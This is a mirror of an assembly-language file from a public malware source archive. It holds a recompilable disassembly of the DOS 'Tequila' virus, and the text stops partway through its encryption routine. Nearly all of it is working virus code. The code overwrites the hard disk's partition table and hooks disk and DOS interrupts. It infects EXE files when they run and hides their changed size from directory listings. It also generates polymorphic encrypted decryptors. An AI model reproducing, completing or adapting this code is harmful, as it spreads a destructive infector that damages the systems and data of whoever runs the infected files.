mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-22 01:58:51 +00:00
4b9382ddbc
push
1089 lines
21 KiB
NASM
1089 lines
21 KiB
NASM
;=============================
|
||
; the tequila virus =
|
||
; a recompilable =
|
||
; dis-assembly =
|
||
; specifically designed =
|
||
; for assembly to a COM file =
|
||
; with the A86 assembler. =
|
||
; ++++++++++++++++++ =
|
||
; If you desire a "perfect" =
|
||
; byte for byte source code =
|
||
;match-up, the MASM assembler=
|
||
; must be used and the noted =
|
||
;instructions must be changed=
|
||
; to comply with MASM syntax.=
|
||
; In addition, all byte and =
|
||
;word pointer references must=
|
||
; be changed from B and W to =
|
||
; BYTE POINTER and WORD =
|
||
; POINTER. =
|
||
;=============================
|
||
|
||
|
||
CODE_SEG SEGMENT
|
||
ASSUME CS:CODE_SEG, DS:CODE_SEG, ES:CODE_SEG, SS:CODE_SEG
|
||
ORG 0100
|
||
TEQUILA PROC NEAR
|
||
|
||
JMP START
|
||
|
||
DB 000, 000, 000, 000, 000, 000, 000, 0FFH, 0FFH
|
||
DB 009, 005, 001H, 010H, 000, 000, 002H, 0FAH, 000, 00CH
|
||
|
||
DB 00DH, 00AH, 00DH, 00AH
|
||
DB "Welcome to T.TEQUILA's latest production.", 00DH, 00AH
|
||
DB "Contact T.TEQUILA/P.o.Box 543/6312 St'hausen/"
|
||
DB "Switzerland.", 00DH, 00AH
|
||
DB "Loving thoughts to L.I.N.D.A", 00DH, 00AH, 00DH, 00AH
|
||
DB "BEER and TEQUILA forever !", 00DH, 00AH, 00DH, 00AH
|
||
DB "$"
|
||
|
||
DB "Execute: mov ax, FE03 / int 21. Key to go on!"
|
||
|
||
|
||
PROGRAM_TERMINATION_ROUTINE:
|
||
PUSH BP
|
||
MOV BP,SP
|
||
SUB SP,0CH
|
||
PUSH AX
|
||
PUSH BX
|
||
PUSH CX
|
||
PUSH DX
|
||
PUSH SI
|
||
PUSH DI
|
||
PUSH ES
|
||
PUSH DS
|
||
PUSH CS
|
||
POP DS
|
||
MOV AX,W[6]
|
||
INC AX
|
||
JE 0243H ;Masm Mod. Needed
|
||
DEC AX
|
||
JNE 020DH ;Masm Mod. Needed
|
||
DEC W[8] ;Masm Mod. Needed
|
||
JNE 0243H ;Masm Mod. Needed
|
||
JMP 0246H ;Masm Mod. Needed
|
||
MOV AH,02AH
|
||
CALL INT_21
|
||
MOV SI,CX
|
||
MOV CX,W[8]
|
||
CMP CL,DL
|
||
JNE 022FH ;Masm Mod. Needed
|
||
MOV AX,SI
|
||
SUB AX,W[6]
|
||
MUL B[011H] ;Masm Mod. Needed
|
||
ADD AL,DH
|
||
ADD CH,3
|
||
CMP AL,CH
|
||
JAE 0237H ;Masm Mod. Needed
|
||
MOV W[6],0FFFFH ;Masm Mod. Needed
|
||
JMP 0243H ;Masm Mod. Needed
|
||
MOV W[6],0 ;Masm Mod. Needed
|
||
MOV W[8],3 ;Masm Mod. Needed
|
||
JMP 02DF ;Masm Mod. Needed
|
||
MOV BX,0B800H
|
||
INT 011
|
||
AND AX,030H
|
||
CMP AX,030H
|
||
JNE 0256H ;Masm Mod. Needed
|
||
MOV BX,0B000H
|
||
MOV ES,BX
|
||
XOR BX,BX
|
||
MOV DI,0FD8FH
|
||
MOV SI,0FC18H
|
||
MOV W[BP-2],SI
|
||
MOV W[BP-4],DI
|
||
MOV CX,01E
|
||
MOV AX,W[BP-2]
|
||
IMUL AX
|
||
MOV W[BP-8],AX
|
||
MOV W[BP-6],DX
|
||
MOV AX,W[BP-4]
|
||
IMUL AX
|
||
MOV W[BP-0C],AX
|
||
MOV W[BP-0A],DX
|
||
ADD AX,W[BP-8]
|
||
ADC DX,W[BP-6]
|
||
CMP DX,0F
|
||
JAE 02B0 ;Masm Mod. Needed
|
||
MOV AX,W[BP-2]
|
||
IMUL W[BP-4]
|
||
IDIV W[0F] ;Masm Mod. Needed
|
||
ADD AX,DI
|
||
MOV W[BP-4],AX
|
||
MOV AX,W[BP-8]
|
||
MOV DX,W[BP-6]
|
||
SUB AX,W[BP-0C]
|
||
SBB DX,W[BP-0A]
|
||
IDIV W[0D] ;Masm Mod. Needed
|
||
ADD AX,SI
|
||
MOV W[BP-2],AX
|
||
LOOP 0269 ;Masm Mod. Needed
|
||
INC CX
|
||
SHR CL,1
|
||
MOV CH,CL
|
||
MOV CL,0DB
|
||
ES MOV W[BX],CX ;Masm Mod. Needed
|
||
INC BX
|
||
INC BX
|
||
ADD SI,012
|
||
CMP SI,01B8
|
||
JL 0260 ;Masm Mod. Needed
|
||
ADD DI,034
|
||
CMP DI,02A3
|
||
JL 025D ;Masm Mod. Needed
|
||
XOR DI,DI
|
||
MOV SI,0BB
|
||
MOV CX,02D
|
||
CLD
|
||
MOVSB
|
||
INC DI
|
||
LOOP 02D7 ;Masm Mod. Needed
|
||
XOR AX,AX
|
||
INT 016
|
||
POP DS
|
||
POP ES
|
||
POP DI
|
||
POP SI
|
||
POP DX
|
||
POP CX
|
||
POP BX
|
||
POP AX
|
||
MOV SP,BP
|
||
POP BP
|
||
RET
|
||
|
||
PRINT_MESSAGE:
|
||
PUSH DX
|
||
PUSH DS
|
||
PUSH CS
|
||
POP DS
|
||
MOV AH,9
|
||
MOV DX,012
|
||
CALL INT_21
|
||
POP DS
|
||
POP DX
|
||
RET
|
||
|
||
NEW_PARTITION_TABLE:
|
||
CLI
|
||
XOR BX,BX
|
||
MOV DS,BX
|
||
MOV SS,BX
|
||
MOV SP,07C00
|
||
STI
|
||
XOR DI,DI
|
||
SUB W[0413],3 ;Masm Mod. Needed
|
||
INT 012
|
||
MOV CL,6
|
||
SHL AX,CL
|
||
MOV ES,AX
|
||
PUSH ES
|
||
MOV AX,022A
|
||
PUSH AX
|
||
MOV AX,0205
|
||
MOV CX,W[07C30]
|
||
INC CX
|
||
MOV DX,W[07C32]
|
||
INT 013
|
||
RETF
|
||
|
||
DB 002, 0FE
|
||
DB 04C, 0E9
|
||
DB 080, 004
|
||
|
||
PUSH CS
|
||
POP DS
|
||
XOR AX,AX
|
||
MOV ES,AX
|
||
MOV BX,07C00
|
||
PUSH ES
|
||
PUSH BX
|
||
MOV AX,0201
|
||
MOV CX,W[0226]
|
||
MOV DX,W[0228]
|
||
INT 013
|
||
PUSH CS
|
||
POP ES
|
||
CLD
|
||
MOV SI,0409
|
||
MOV DI,09BE
|
||
MOV CX,046
|
||
REP MOVSB
|
||
MOV SI,091B
|
||
MOV DI,0A04
|
||
MOV CX,045
|
||
REP MOVSB
|
||
CLI
|
||
XOR AX,AX
|
||
MOV ES,AX
|
||
ES LES BX,[070] ;Masm Mod. Needed
|
||
MOV W[09B0],BX ;Masm Mod. Needed
|
||
MOV W[09B2],ES ;Masm Mod. Needed
|
||
MOV ES,AX
|
||
ES LES BX,[084] ;Masm Mod. Needed
|
||
MOV W[09B4],BX ;Masm Mod. Needed
|
||
MOV W[09B6],ES ;Masm Mod. Needed
|
||
MOV ES,AX
|
||
ES MOV W[070],044F ;Masm Mod. Needed
|
||
ES MOV W[072],DS ;Masm Mod. Needed
|
||
STI
|
||
RETF
|
||
|
||
INSTALL:
|
||
CALL NEXT_LINE
|
||
NEXT_LINE:
|
||
POP SI
|
||
SUB SI,028F
|
||
PUSH SI
|
||
PUSH AX
|
||
PUSH ES
|
||
PUSH CS
|
||
POP DS
|
||
MOV AX,ES
|
||
ADD W[SI+2],AX
|
||
ADD W[SI+4],AX
|
||
DEC AX
|
||
MOV ES,AX
|
||
MOV AX,0FE02
|
||
INT 021
|
||
CMP AX,01FD
|
||
JE NO_PARTITION_INFECTION
|
||
ES CMP B[0],05A ;Masm Mod. Needed
|
||
JNE NO_PARTITION_INFECTION
|
||
ES CMP W[3],0BB ;Masm Mod. Needed
|
||
JBE NO_PARTITION_INFECTION
|
||
ES MOV AX,W[012] ;Masm Mod. Needed
|
||
SUB AX,0BB
|
||
MOV ES,AX
|
||
XOR DI,DI
|
||
MOV CX,09A4
|
||
CLD
|
||
REP MOVSB
|
||
PUSH ES
|
||
POP DS
|
||
CALL INFECT_PARTITION_TABLE
|
||
NO_PARTITION_INFECTION:
|
||
POP ES
|
||
POP AX
|
||
PUSH ES
|
||
POP DS
|
||
POP SI
|
||
CS MOV SS,W[SI+4] ;Masm Mod. Needed
|
||
CHAIN_TO_THE_HOST_FILE:
|
||
CS JMP D[SI] ;Masm Mod. Needed
|
||
|
||
INFECT_PARTITION_TABLE:
|
||
MOV AH,02A
|
||
INT 021
|
||
MOV W[6],CX ;Masm Mod. Needed
|
||
MOV W[8],DX ;Masm Mod. Needed
|
||
MOV AH,052
|
||
INT 021
|
||
ES MOV AX,W[BX-2] ;Masm Mod. Needed
|
||
MOV W[03E8],AX ;Masm Mod. Needed
|
||
MOV AX,03513
|
||
INT 021
|
||
MOV W[09A0],BX ;Masm Mod. Needed
|
||
MOV W[09A2],ES ;Masm Mod. Needed
|
||
MOV AX,03501
|
||
INT 021
|
||
MOV SI,BX
|
||
MOV DI,ES
|
||
MOV AX,02501
|
||
MOV DX,03DA
|
||
INT 021
|
||
MOV B[0A],0 ;Masm Mod. Needed
|
||
PUSHF
|
||
POP AX
|
||
OR AX,0100
|
||
PUSH AX
|
||
POPF
|
||
MOV AX,0201
|
||
MOV BX,09A4
|
||
MOV CX,1
|
||
MOV DX,080
|
||
PUSH DS
|
||
POP ES
|
||
PUSHF
|
||
CALL D[09A0] ;Masm Mod. Needed
|
||
PUSHF
|
||
POP AX
|
||
AND AX,0FEFF
|
||
PUSH AX
|
||
POPF
|
||
PUSHF
|
||
MOV AX,02501
|
||
MOV DX,SI
|
||
MOV DS,DI
|
||
INT 021
|
||
POPF
|
||
JAE 0450 ;Masm Mod. Needed
|
||
JMP RET ;Masm Mod. Needed
|
||
PUSH ES
|
||
POP DS
|
||
CMP W[BX+02E],0FE02
|
||
JNE 045C ;Masm Mod. Needed
|
||
JMP RET ;Masm Mod. Needed
|
||
ADD BX,01BE
|
||
MOV CX,4
|
||
MOV AL,B[BX+4]
|
||
CMP AL,4
|
||
JE 0479 ;Masm Mod. Needed
|
||
CMP AL,6
|
||
JE 0479 ;Masm Mod. Needed
|
||
CMP AL,1
|
||
JE 0479 ;Masm Mod. Needed
|
||
ADD BX,010
|
||
LOOP 0463 ;Masm Mod. Needed
|
||
JMP SHORT RET ;Masm Mod. Needed
|
||
MOV DL,080
|
||
MOV DH,B[BX+5]
|
||
MOV W[0228],DX ;Masm Mod. Needed
|
||
MOV AX,W[BX+6]
|
||
MOV CX,AX
|
||
MOV SI,6
|
||
AND AX,03F
|
||
CMP AX,SI
|
||
JBE RET ;Masm Mod. Needed
|
||
SUB CX,SI
|
||
MOV DI,BX
|
||
INC CX
|
||
MOV W[0226],CX ;Masm Mod. Needed
|
||
MOV AX,0301
|
||
MOV BX,09A4
|
||
PUSHF
|
||
CALL D[09A0] ;Masm Mod. Needed
|
||
JB RET ;Masm Mod. Needed
|
||
DEC CX
|
||
MOV W[DI+6],CX
|
||
INC CX
|
||
SUB W[DI+0C],SI
|
||
SBB W[DI+0E],0
|
||
MOV AX,0305
|
||
MOV BX,0
|
||
INC CX
|
||
PUSHF
|
||
CALL D[09A0] ;Masm Mod. Needed
|
||
JB RET ;Masm Mod. Needed
|
||
MOV SI,01F6
|
||
MOV DI,09A4
|
||
MOV CX,034
|
||
CLD
|
||
REP MOVSB
|
||
MOV AX,0301
|
||
MOV BX,09A4
|
||
MOV CX,1
|
||
XOR DH,DH
|
||
PUSHF
|
||
CALL D[09A0] ;Masm Mod. Needed
|
||
RET
|
||
|
||
NEW_INTERRUPT_ONE:
|
||
PUSH BP
|
||
MOV BP,SP
|
||
CS CMP B[0A],1 ;Masm Mod. Needed
|
||
JE 0506 ;Masm Mod. Needed
|
||
CMP W[BP+4],09B4
|
||
JA 050B ;Masm Mod. Needed
|
||
PUSH AX
|
||
PUSH ES
|
||
LES AX,[BP+2]
|
||
CS MOV W[09A0],AX ;Masm Mod. Needed
|
||
CS MOV W[09A2],ES ;Masm Mod. Needed
|
||
CS MOV B[0A],1
|
||
POP ES
|
||
POP AX
|
||
AND W[BP+6],0FEFF
|
||
POP BP
|
||
IRET
|
||
|
||
NEW_INTERRUPT_13:
|
||
CMP CX,1
|
||
JNE 054E ;Masm Mod. Needed
|
||
CMP DX,080
|
||
JNE 054E ;Masm Mod. Needed
|
||
CMP AH,3
|
||
JA 054E ;Masm Mod. Needed
|
||
CMP AH,2
|
||
JB 054E ;Masm Mod. Needed
|
||
PUSH CX
|
||
PUSH DX
|
||
DEC AL
|
||
JE 0537 ;Masm Mod. Needed
|
||
PUSH AX
|
||
PUSH BX
|
||
ADD BX,0200
|
||
INC CX
|
||
PUSHF
|
||
CS CALL D[09A0] ;Masm Mod. Needed
|
||
POP BX
|
||
POP AX
|
||
MOV AL,1
|
||
CS MOV CX,W[0226] ;Masm Mod. Needed
|
||
CS MOV DX,W[0228] ;Masm Mod. Needed
|
||
PUSHF
|
||
CS CALL D[09A0] ;Masm Mod. Needed
|
||
POP DX
|
||
POP CX
|
||
RETF 2
|
||
CS JMP D[09A0] ;Masm Mod. Needed
|
||
|
||
NEW_TIMER_TICK_INTERRUPT:
|
||
PUSH AX
|
||
PUSH BX
|
||
PUSH ES
|
||
PUSH DS
|
||
XOR AX,AX
|
||
MOV ES,AX
|
||
PUSH CS
|
||
POP DS
|
||
ES LES BX,[084] ;Masm Mod. Needed
|
||
MOV AX,ES
|
||
CMP AX,0800
|
||
JA 05B0 ;Masm Mod. Needed
|
||
CMP AX,W[09B6]
|
||
JNE 0575 ;Masm Mod. Needed
|
||
CMP BX,W[09B4]
|
||
JE 05B0 ;Masm Mod. Needed
|
||
MOV W[09B4],BX ;Masm Mod. Needed
|
||
MOV W[09B6],ES ;Masm Mod. Needed
|
||
XOR AX,AX
|
||
MOV DS,AX
|
||
CS LES BX,[09B0] ;Masm Mod. Needed
|
||
MOV W[070],BX ;Masm Mod. Needed
|
||
MOV W[072],ES ;Masm Mod. Needed
|
||
LES BX,[04C] ;Masm Mod. Needed
|
||
CS MOV W[09A0],BX ;Masm Mod. Needed
|
||
CS MOV W[09A2],ES ;Masm Mod. Needed
|
||
MOV W[04C],09BE ;Masm Mod. Needed
|
||
MOV W[04E],CS ;Masm Mod. Needed
|
||
MOV W[084],04B1 ;Masm Mod. Needed
|
||
MOV W[086],CS ;Masm Mod. Needed
|
||
POP DS
|
||
POP ES
|
||
POP BX
|
||
POP AX
|
||
IRET
|
||
|
||
INT_21_INTERCEPT:
|
||
CMP AH,011
|
||
JB CHECK_FOR_HANDLE
|
||
CMP AH,012
|
||
JA CHECK_FOR_HANDLE
|
||
CALL ADJUST_FCB_MATCHES
|
||
RETF 2
|
||
CHECK_FOR_HANDLE:
|
||
CMP AH,04E
|
||
JB CHECK_FOR_PREVIOUS_INSTALLATION
|
||
CMP AH,04F
|
||
JA CHECK_FOR_PREVIOUS_INSTALLATION
|
||
CALL ADJUST_HANDLE_MATCHES
|
||
RETF 2
|
||
CHECK_FOR_PREVIOUS_INSTALLATION:
|
||
CMP AX,0FE02
|
||
JNE CHECK_FOR_MESSAGE_PRINT
|
||
NOT AX
|
||
IRET
|
||
CHECK_FOR_MESSAGE_PRINT:
|
||
CMP AX,0FE03
|
||
JNE CHECK_FOR_EXECUTE
|
||
CS CMP W[6],0 ;Masm Mod. Needed
|
||
JNE CHAIN_TO_TRUE_INT_21
|
||
CALL PRINT_MESSAGE
|
||
IRET
|
||
CHECK_FOR_EXECUTE:
|
||
CMP AX,04B00
|
||
JE SET_STACK
|
||
CMP AH,04C
|
||
JNE CHAIN_TO_TRUE_INT_21
|
||
SET_STACK:
|
||
CS MOV W[09A6],SP ;Masm Mod. Needed
|
||
CS MOV W[09A8],SS ;Masm Mod. Needed
|
||
CLI
|
||
PUSH CS
|
||
POP SS
|
||
MOV SP,0AE5
|
||
STI
|
||
CMP AH,04C
|
||
JNE TO_AN_INFECTION
|
||
CALL PROGRAM_TERMINATION_ROUTINE
|
||
JMP SHORT NO_INFECTION
|
||
TO_AN_INFECTION:
|
||
CALL INFECT_THE_FILE
|
||
NO_INFECTION:
|
||
CLI
|
||
CS MOV SS,W[09A8] ;Masm Mod. Needed
|
||
CS MOV SP,W[09A6] ;Masm Mod. Needed
|
||
STI
|
||
JMP SHORT CHAIN_TO_TRUE_INT_21
|
||
CHAIN_TO_TRUE_INT_21:
|
||
CS INC W[09BC] ;Masm Mod. Needed
|
||
CS JMP D[09B4] ;Masm Mod. Needed
|
||
|
||
NEW_CRITICAL_ERROR_HANDLER:
|
||
MOV AL,3
|
||
IRET
|
||
|
||
ADJUST_FCB_MATCHES:
|
||
PUSH BX
|
||
PUSH ES
|
||
PUSH AX
|
||
MOV AH,02F
|
||
CALL INT_21
|
||
POP AX
|
||
PUSHF
|
||
CS CALL D[09B4] ;Masm Mod. Needed
|
||
PUSHF
|
||
PUSH AX
|
||
CMP AL,0FF
|
||
JE 0664 ;Masm Mod. Needed
|
||
ES CMP B[BX],0FF ;Masm Mod. Needed
|
||
JNE 064F ;Masm Mod. Needed
|
||
ADD BX,7
|
||
ES MOV AL,B[BX+017] ;Masm Mod. Needed
|
||
AND AL,01F
|
||
CMP AL,01F
|
||
JNE 0664 ;Masm Mod. Needed
|
||
ES SUB W[BX+01D],09A4 ;Masm Mod. Needed
|
||
ES SBB W[BX+01F],0 ;Masm Mod. Needed
|
||
POP AX
|
||
POPF
|
||
POP ES
|
||
POP BX
|
||
RET
|
||
|
||
ADJUST_HANDLE_MATCHES:
|
||
PUSH BX
|
||
PUSH ES
|
||
PUSH AX
|
||
MOV AH,02F
|
||
CALL INT_21
|
||
POP AX
|
||
PUSHF
|
||
CS CALL D[09B4] ;Masm Mod. Needed
|
||
PUSHF
|
||
PUSH AX
|
||
JB 0691 ;Masm Mod. Needed
|
||
ES MOV AL,B[BX+016] ;Masm Mod. Needed
|
||
AND AL,01F
|
||
CMP AL,01F
|
||
JNE 0691 ;Masm Mod. Needed
|
||
ES SUB W[BX+01A],09A4 ;Masm Mod. Needed
|
||
ES SBB W[BX+01C],0 ;Masm Mod. Needed
|
||
POP AX
|
||
POPF
|
||
POP ES
|
||
POP BX
|
||
RET
|
||
|
||
WRITE_TO_THE_FILE:
|
||
MOV AH,040
|
||
JMP 069C ;Masm Mod. Needed
|
||
|
||
READ_FROM_THE_FILE:
|
||
MOV AH,03F
|
||
CALL 06B4 ;Masm Mod. Needed
|
||
JB RET ;Masm Mod. Needed
|
||
SUB AX,CX
|
||
RET
|
||
|
||
MOVE_TO_END_OF_FILE:
|
||
XOR CX,CX
|
||
XOR DX,DX
|
||
MOV AX,04202
|
||
JMP 06B4 ;Masm Mod. Needed
|
||
|
||
MOVE_TO_BEGINNING_OF_FILE:
|
||
XOR CX,CX
|
||
XOR DX,DX
|
||
MOV AX,04200
|
||
CS MOV BX,W[09A4] ;Masm Mod. Needed
|
||
|
||
INT_21:
|
||
CLI
|
||
PUSHF
|
||
CS CALL D[09B4] ;Masm Mod. Needed
|
||
RET
|
||
|
||
INFECT_THE_FILE:
|
||
PUSH AX
|
||
PUSH BX
|
||
PUSH CX
|
||
PUSH DX
|
||
PUSH SI
|
||
PUSH DI
|
||
PUSH ES
|
||
PUSH DS
|
||
CALL CHECK_LETTERS_IN_FILENAME
|
||
JAE GOOD_NAME
|
||
JMP BAD_NAME
|
||
|
||
GOOD_NAME:
|
||
PUSH DX
|
||
PUSH DS
|
||
PUSH CS
|
||
POP DS
|
||
|
||
SAVE_AND_REPLACE_CRITICAL_ERROR_HANDLER:
|
||
MOV AX,03524
|
||
CALL INT_21
|
||
MOV W[09B8],BX ;Masm Mod. Needed
|
||
MOV W[09BA],ES ;Masm Mod. Needed
|
||
MOV AX,02524
|
||
MOV DX,052A
|
||
CALL INT_21
|
||
POP DS
|
||
POP DX
|
||
|
||
SAVE_AND_REPLACE_FILE_ATTRIBUTE:
|
||
MOV AX,04300
|
||
CALL INT_21
|
||
CS MOV W[09AA],CX ;Masm Mod. Needed
|
||
JAE 06FE ;Masm Mod. Needed
|
||
JMP RESTORE_CRIT_HANDLER
|
||
MOV AX,04301
|
||
XOR CX,CX
|
||
CALL INT_21
|
||
JB 077C ;Masm Mod. Needed
|
||
|
||
OPEN_FILE_FOR_READ_WRITE:
|
||
MOV AX,03D02
|
||
CALL INT_21
|
||
JB 0771 ;Masm Mod. Needed
|
||
PUSH DX
|
||
PUSH DS
|
||
PUSH CS
|
||
POP DS
|
||
MOV W[09A4],AX ;Masm Mod. Needed
|
||
|
||
GET_FILEDATE:
|
||
MOV AX,05700
|
||
CALL 06B4 ;Masm Mod. Needed
|
||
JB 075C ;Masm Mod. Needed
|
||
MOV W[09AC],DX ;Masm Mod. Needed
|
||
MOV W[09AE],CX ;Masm Mod. Needed
|
||
|
||
READ_AND_CHECK_EXE_HEADER:
|
||
CALL 06AD ;Masm Mod. Needed
|
||
MOV DX,0A49
|
||
MOV CX,01C
|
||
CALL 069A ;Masm Mod. Needed
|
||
JB 075C ;Masm Mod. Needed
|
||
PUSH DS
|
||
POP ES
|
||
MOV DI,0E8
|
||
MOV CX,020
|
||
CMP W[0A49],05A4D ;Masm Mod. Needed
|
||
JNE 075C ;Masm Mod. Needed
|
||
MOV AX,W[0A5B]
|
||
CLD
|
||
REPNE SCASW
|
||
JNE 0754 ;Masm Mod. Needed
|
||
OR W[09AE],01F ;Masm Mod. Needed
|
||
JMP 075C ;Masm Mod. Needed
|
||
CALL READ_PAST_END_OF_FILE
|
||
JB 075C ;Masm Mod. Needed
|
||
CALL ENCRYPT_AND_WRITE_TO_FILE
|
||
|
||
RESTORE_ALTERED_DATE:
|
||
MOV AX,05701
|
||
MOV DX,W[09AC]
|
||
MOV CX,W[09AE]
|
||
CALL 06B4 ;Masm Mod. Needed
|
||
|
||
CLOSE_THE_FILE:
|
||
MOV AH,03E
|
||
CALL 06B4 ;Masm Mod. Needed
|
||
|
||
RESTORE_FILE_ATTRIBUTE:
|
||
POP DS
|
||
POP DX
|
||
MOV AX,04301
|
||
CS MOV CX,W[09AA] ;Masm Mod. Needed
|
||
CALL INT_21
|
||
|
||
RESTORE_CRIT_HANDLER:
|
||
MOV AX,02524
|
||
CS LDS DX,[09B8] ;Masm Mod. Needed
|
||
CALL INT_21
|
||
|
||
BAD_NAME:
|
||
POP DS
|
||
POP ES
|
||
POP DI
|
||
POP SI
|
||
POP DX
|
||
POP CX
|
||
POP BX
|
||
POP AX
|
||
RET
|
||
|
||
CHECK_LETTERS_IN_FILENAME:
|
||
PUSH DS
|
||
POP ES
|
||
MOV DI,DX
|
||
MOV CX,-1
|
||
XOR AL,AL
|
||
CLD
|
||
REPNE SCASB
|
||
NOT CX
|
||
MOV DI,DX
|
||
MOV AX,04353
|
||
MOV SI,CX
|
||
SCASW
|
||
JE 07B7 ;Masm Mod. Needed
|
||
DEC DI
|
||
LOOP 07A5 ;Masm Mod. Needed
|
||
MOV CX,SI
|
||
MOV DI,DX
|
||
MOV AL,056
|
||
REPNE SCASB
|
||
JE 07B7 ;Masm Mod. Needed
|
||
CLC
|
||
RET
|
||
STC
|
||
RET
|
||
|
||
READ_PAST_END_OF_FILE:
|
||
MOV CX,-1
|
||
MOV DX,-0A
|
||
CALL 06A8 ;Masm Mod. Needed
|
||
MOV DX,0A65
|
||
MOV CX,8
|
||
CALL 069A ;Masm Mod. Needed
|
||
JB RET ;Masm Mod. Needed
|
||
CMP W[0A65],0FDF0 ;Masm Mod. Needed
|
||
JNE 07F0 ;Masm Mod. Needed
|
||
CMP W[0A67],0AAC5 ;Masm Mod. Needed
|
||
JNE 07F0 ;Masm Mod. Needed
|
||
MOV CX,-1
|
||
MOV DX,-9
|
||
CALL 06A8 ;Masm Mod. Needed
|
||
MOV DX,0A6B
|
||
MOV CX,4
|
||
CALL 0696 ;Masm Mod. Needed
|
||
RET
|
||
CLC
|
||
RET
|
||
|
||
ENCRYPT_AND_WRITE_TO_FILE:
|
||
CALL MOVE_TO_END_OF_FILE
|
||
MOV SI,AX
|
||
MOV DI,DX
|
||
MOV BX,0A49
|
||
MOV AX,W[BX+4]
|
||
MUL W[0D] ;Masm Mod. Needed
|
||
SUB AX,SI
|
||
SBB DX,DI
|
||
JAE 080C ;Masm Mod. Needed
|
||
JMP OUT_OF_ENCRYPT
|
||
MOV AX,W[BX+8]
|
||
MUL W[0B] ;Masm Mod. Needed
|
||
SUB SI,AX
|
||
SBB DI,DX
|
||
MOV AX,W[BX+0E]
|
||
MOV W[4],AX ;Masm Mod. Needed
|
||
ADD W[4],010 ;Masm Mod. Needed
|
||
MUL W[0B] ;Masm Mod. Needed
|
||
ADD AX,W[BX+010]
|
||
SUB AX,SI
|
||
SBB DX,DI
|
||
JB 083C ;Masm Mod. Needed
|
||
SUB AX,080
|
||
SBB DX,0
|
||
JB RET ;Masm Mod. Needed
|
||
ADD W[BX+0E],09B
|
||
MOV AX,W[BX+016]
|
||
ADD AX,010
|
||
MOV W[2],AX ;Masm Mod. Needed
|
||
MOV AX,W[BX+014]
|
||
MOV W[0],AX ;Masm Mod. Needed
|
||
CALL 06A4 ;Masm Mod. Needed
|
||
ADD AX,09A4
|
||
ADC DX,0
|
||
DIV W[0D] ;Masm Mod. Needed
|
||
INC AX
|
||
MOV W[0A4D],AX ;Masm Mod. Needed
|
||
MOV W[0A4B],DX ;Masm Mod. Needed
|
||
MOV DX,DI
|
||
MOV AX,SI
|
||
DIV W[0B] ;Masm Mod. Needed
|
||
MOV W[0A5F],AX ;Masm Mod. Needed
|
||
MOV BX,DX
|
||
ADD DX,0960
|
||
MOV W[0A5D],DX ;Masm Mod. Needed
|
||
CALL COPY_TO_HIGH_MEMORY_ENCRYPT_WRITE
|
||
JB RET ;Masm Mod. Needed
|
||
OR W[09AE],01F ;Masm Mod. Needed
|
||
MOV BX,W[09BC]
|
||
AND BX,01F
|
||
SHL BX,1
|
||
MOV AX,W[BX+0E8]
|
||
MOV W[0A5B],AX ;Masm Mod. Needed
|
||
CALL MOVE_TO_BEGINNING_OF_FILE
|
||
MOV CX,01C
|
||
MOV DX,0A49
|
||
|
||
WRITE_THE_NEW_HEADER:
|
||
CALL 0696 ;Masm Mod. Needed
|
||
OUT_OF_ENCRYPT:
|
||
RET
|
||
|
||
COPY_TO_HIGH_MEMORY_ENCRYPT_WRITE:
|
||
PUSH BP
|
||
XOR AH,AH
|
||
INT 01A
|
||
MOV AX,DX
|
||
MOV BP,DX
|
||
PUSH DS
|
||
POP ES
|
||
MOV DI,0960
|
||
MOV SI,DI
|
||
MOV CX,020
|
||
CLD
|
||
REP STOSW
|
||
XOR DX,DX
|
||
MOV ES,DX
|
||
CALL ENCRYPT_STEP_ONE
|
||
CALL ENCRYPT_STEP_TWO
|
||
CALL ENCRYPT_STEP_THREE
|
||
MOV B[SI],0E9
|
||
MOV DI,028C
|
||
SUB DI,SI
|
||
SUB DI,3
|
||
INC SI
|
||
MOV W[SI],DI
|
||
MOV AX,0A04
|
||
CALL AX
|
||
POP BP
|
||
RET
|
||
|
||
ENCRYPT_STEP_ONE:
|
||
DEC BP
|
||
ES TEST B[BP],2 ;Masm Mod. Needed
|
||
JNE 08EB ;Masm Mod. Needed
|
||
MOV B[SI],0E
|
||
INC SI
|
||
CALL GARBLER
|
||
MOV B[SI],01F
|
||
INC SI
|
||
CALL GARBLER
|
||
RET
|
||
MOV W[SI],0CB8C
|
||
INC SI
|
||
INC SI
|
||
CALL GARBLER
|
||
MOV W[SI],0DB8E
|
||
INC SI
|
||
INC SI
|
||
CALL GARBLER
|
||
RET
|
||
|
||
ENCRYPT_STEP_TWO:
|
||
AND CH,0FE
|
||
DEC BP
|
||
ES TEST B[BP],2 ;Masm Mod. Needed
|
||
JE 0920 ;Masm Mod. Needed
|
||
OR CH,1
|
||
MOV B[SI],0BE
|
||
INC SI
|
||
MOV W[SI],BX
|
||
INC SI
|
||
INC SI
|
||
CALL GARBLER
|
||
ADD BX,0960
|
||
TEST CH,1
|
||
JE 0934 ;Masm Mod. Needed
|
||
MOV B[SI],0BB
|
||
INC SI
|
||
MOV W[SI],BX
|
||
INC SI
|
||
INC SI
|
||
CALL GARBLER
|
||
ADD BX,0960
|
||
TEST CH,1
|
||
JE 090C ;Masm Mod. Needed
|
||
SUB BX,0960
|
||
CALL GARBLER
|
||
MOV B[SI],0B9
|
||
INC SI
|
||
MOV AX,0960
|
||
MOV W[SI],AX
|
||
INC SI
|
||
INC SI
|
||
CALL GARBLER
|
||
CALL GARBLER
|
||
RET
|
||
|
||
ENCRYPT_STEP_THREE:
|
||
MOV AH,014
|
||
MOV DH,017
|
||
TEST CH,1
|
||
JE 0958 ;Masm Mod. Needed
|
||
XCHG DH,AH
|
||
MOV DI,SI
|
||
MOV AL,08A
|
||
MOV W[SI],AX
|
||
INC SI
|
||
INC SI
|
||
CALL GARBLER
|
||
XOR DL,DL
|
||
MOV B[0A39],028 ;Masm Mod. Needed
|
||
DEC BP
|
||
ES TEST B[BP],2 ;Masm Mod. Needed
|
||
JE 0978 ;Masm Mod. Needed
|
||
MOV DL,030
|
||
MOV B[0A39],DL ;Masm Mod. Needed
|
||
MOV W[SI],DX
|
||
INC SI
|
||
INC SI
|
||
MOV W[SI],04346
|
||
INC SI
|
||
INC SI
|
||
CALL GARBLER
|
||
MOV AX,0FE81
|
||
MOV CL,0BE
|
||
TEST CH,1
|
||
JE 0993 ;Masm Mod. Needed
|
||
MOV AH,0FB
|
||
MOV CL,0BB
|
||
MOV W[SI],AX
|
||
INC SI
|
||
INC SI
|
||
PUSH BX
|
||
ADD BX,040
|
||
MOV W[SI],BX
|
||
INC SI
|
||
INC SI
|
||
POP BX
|
||
MOV B[SI],072
|
||
INC SI
|
